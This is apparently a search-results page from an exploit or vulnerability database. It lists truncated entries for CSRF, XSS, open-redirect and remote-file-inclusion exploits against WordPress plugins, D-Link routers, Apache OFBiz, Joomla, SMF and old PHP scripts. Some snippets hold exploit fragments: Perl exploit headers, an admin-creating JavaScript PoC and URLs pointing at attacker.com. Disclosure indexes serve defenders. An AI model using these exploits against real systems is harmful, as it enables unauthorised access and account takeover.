44 matches found
Upload Media By URL < 1.0.8 - Stored XSS via CSRF
Description The plugin does not have CSRF check when uploading files, which could allow attackers to make logged in admins upload files including HTML containing JS code for users with the unfilteredhtml capability on their behalf. Have a logged in user with the unfilteredhtml capability open an...
DLINK DIR850 - Open Redirect
Exploit Title: DLINK DIR850 - Open Redirect Product: Dlink Model: DIR850 Date: 14/1/2022 CVE: CVE-2021-46379 Exploit Author: AhmedAlroky Hardware version: b1 Firmware version: ET850-1.08TRb03 Vendor home page: https://www.dlink.com/ Exploit : Visit...
Logitech: One Click Account takeover using Ouath CSRF bypass by adding Null byte %00 in state parameter on www.streamlabs.com
Summary Hello Team I have found a bypass to the this report. 1039749 Steps To Reproduce: 1. Login to attacker's account and go to settings -- account settings. 2. Intercept the request in burp suite and click on merge twitch account. 3. Allow twitch access and once you see a get request in burp...
PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)
Exploit Title: PilusCart 1.4.1 - Cross-Site Request Forgery Add Admin Google Dork: N/A Date: 10-03-2019 Exploit Author: Gionathan "John" Reale Vendor Homepage: https://github.com/piluscart Software Link:...
X (Formerly Twitter): Blind XSS in Mobpub Marketplace Admin Production | Sentry via demand.mopub.com (User-Agent)
Summary: I've identified a Blind XSS vulnerability that fires in the Mobpub Marketplace Admin Production | Sentry dashboard and can be triggered by sending a HTTPS request to an endpoint from the domain demand.mopub.com. Description: I've sent the following HTTPS request to the following URL...
Ruby on Rails: CSRF header is sent to external websites when using data-remote forms
Looks like there is a regression in the fix for CVE-2015-1840 H1 report. The origin isn't being checked before adding a CSRF header to data-remote forms. I noticed this when checking out the new rails-ujs repo. Example Rails template: submit Example http://attacker.com app require "sinatra" optio...
SAPID SHOP <= 1.3 - Remote File Include Vulnerability
No description provided by source. Download Script : http://sourceforge.net/projects/sapid/files Vuln : ./SAPID-SHOP-1.3/usr/extensions/gettree.inc.php line 11 ?php require $formsdir.calmenuform.php; if!definedcommonextfunctions definecommonextfunctions, loaded;...
phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit
No description provided by source. !/usr/bin/perl phpBB Security 1.0.1 Class: Remote File Include Vulnerability Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbb-amod.com/downloads/phpBBSecurity.zip...
ProdLer <= 2.0 - Remote File Include Vulnerability
No description provided by source. In The Name Of Allah ProdLer = 2.0 Remote File Include Vulnerability Download Script : http://sourceforge.net/projects/prodler/files/ Author : cr4wl3r Contact : cr4wl3r4tlinuxmaildotorg Location : Gorontalo - INDONESIA Blog : http://sh3ll4u.blogspot.com Dork : N...
phpBB SpamBlocker Mod <= 1.0.2 - Remote File Include Exploit
No description provided by source. !/usr/bin/perl SpamBlockerMod package for phpBB Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://leo.vak.ru/devel/spamblocker/spamblockermodv1.0.2.zip...
efront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability
No description provided by source. efront = 3.5.4 Remote File Include Vulnerability Download Script : http://sourceforge.net/projects/efrontlearning/files/ Author : cr4wl3r Contact : cr4wl3r4tlinuxmaildotorg Location : Gorontalo - INDONESIA file : database.php line 15...
phpPollScript <= 1.3 (include_class) Remote File Inclusion Vulnerability
No description provided by source. phpPollScript = 1.3 Remote File Include Vulnerability Download Script : http://download.tomex.org/phpPollScriptv13b.zip Author : cr4wl3r Contact : cr4wl3r4tlinuxmaildotorg Location : Gorontalo - INDONESIA file : init.poll.php line 2 $incpath =...
Simple Machines Forum <= 1.1.7 - CSRF/XSS/Package Upload
No description provided by source. Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the admin link between the SMF to load the file:...
Apache OFBiz - FULLADMIN Creator PoC Payload
No description provided by source. / Apache OFBiz FULLADMIN Creator PoC Payload. CVE: CVE-2010-0432 By: Lucas Apa lucas -at- bonsai-sec.com . Bonsai Information Security http://www.bonsai-sec.com/ / var username = 'bonsaiUser'; var password = 'bonsaiPass'; var nodes =...
HotNews 0.7.2 - Remote File Inclusion
No description provided by source. ================================================================================================ ================================================================================================ == @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == ==...
Joomla! 1.6.3 - Cross-Site Request Forgery
This vulnerability takes advantage of the recent Joomla 1.6.3 XSS vulnerability http://seclists.org/fulldisclosure/2011/Jun/519 to execute a CSRF vulnerability to create a superuser account. / joom163.js Joomla 1.6.3 XSS - CSRF Exploit Greetz to Shardy, Xires & Stacy, Rage, coorslitedude,...
Apache OFBiz - Admin Creator
/ Apache OFBiz FULLADMIN Creator PoC Payload. CVE: CVE-2010-0432 By: Lucas Apa lucas -at- bonsai-sec.com . Bonsai Information Security http://www.bonsai-sec.com/ / var username = 'bonsaiUser'; var password = 'bonsaiPass'; var nodes = document.getElementsByClassName'fieldWidth300'; for var i=0;...
HotNews 0.7.2 Remote File Inclusion
================================================================================================ ================================================================================================ == @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == == @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@...
HotNews 0.7.2 - Remote File Inclusion
HotNews 0.7.2 - Remote File Inclusion ================================================================================================ ================================================================================================ == @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == ...
HotNews 0.7.2 Remote File Inclusion
Exploit for php platform in category web applications =================================== HotNews 0.7.2 Remote File Inclusion =================================== ================================================================================================...